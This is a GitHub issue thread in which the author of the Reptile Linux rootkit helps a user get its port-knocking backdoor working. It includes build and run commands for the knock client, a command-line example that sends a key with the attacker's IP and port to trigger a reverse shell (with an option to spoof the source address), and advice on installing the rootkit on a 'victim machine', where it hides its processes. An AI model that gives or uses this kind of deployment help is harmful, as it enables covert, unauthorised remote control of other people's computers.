Having trouble in getting the backdoor to work about reptile HOT 11 CLOSED

You have to install the rootkit only on victim machine. On your attacker machine you will only run the client.

I did the shellscript and makefiles to generate the client on the victim to give you a way to attack from the victim to another hosts in the network. But from your main attack machine perspective you only have to compile knock.c just typing:

cd Reptile/sbin
gcc knock.c -o knock
./knock 

You have to chose the protocol, target address, source address (if you want spoof your address), the payload with key+ip+port.

You dont need to use netcat, cause I already have implement the listener, just use -l options at the end. Something like that:

./knock -x icmp -s (spoofed ip) -t (target IP) -d "F0rb1dd3n (attacker IP) (attacker port)" -l

Take a look into the code and change the key on heavens_door.c if you want.

I think it helps you.

F0rb1dd3n

from reptile.

Hello, Should I run ./heavens_door command first on the victim machine?
I run ./heavens_door command on the victim machine and run lsof -i tcp:80, but nothing shows on the screen. I think it should listen on the port 80

from reptile.

No man, Reptile already run heavens_door for you and hide her processes. You just have to run ./installer.sh install and nothing more. Also, heavens_door doesnt listen any port, that is a port knocking backdoor, she just inspect the packets that are being received on the machine, and returns a shell if is a right packet.

Originally I have configured just to inspect packets received via ICMP or TCP on port 80 or UDP on port 53. But that is irrelevant, you can change this. There is not a listen port, but a inspection of packets that are targeting a port.

from reptile.

Hello, I have doubt in the <reverse IP> in the line below:

-d Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"

If my real source ip is 192.168.2.13, should I use -d "F0rb1dd3n 31.2.861.291 4444" in reverse form instead of -d "F0rb1dd3n 192.168.2.13 4444"?

from reptile.

no man, you have to use the normal form -d "F0rb1dd3n 192.168.2.13 4444"

The client will do all the job for you.

from reptile.

@rabbpigPan are you having any another trouble? Can we close this issue?

from reptile.

Yes, I am still having trouble in getting the backdoor to work. After I entered the correct source IP and target IP,

Knock Knock on Heaven's (Back)Door
Written by: F0rb1dd3n

Knock knock Neo...

[+] Knocking with UDP protocol
.........
[+] 59 bytes was sent

it only showed the information above and didn't prompt the reverse shell for a long time.

Does it support the NAT network or only work on the local network?

from reptile.

This backdoor does not support NAT, only local network

from reptile.

Thanks for your reply. You can close the issue now.

from reptile.

这个后门不支持NAT，只支持本地网络

Does not support the public network, only supports the internal network?

from reptile.

Just the internal, unless you have a NAT

from reptile.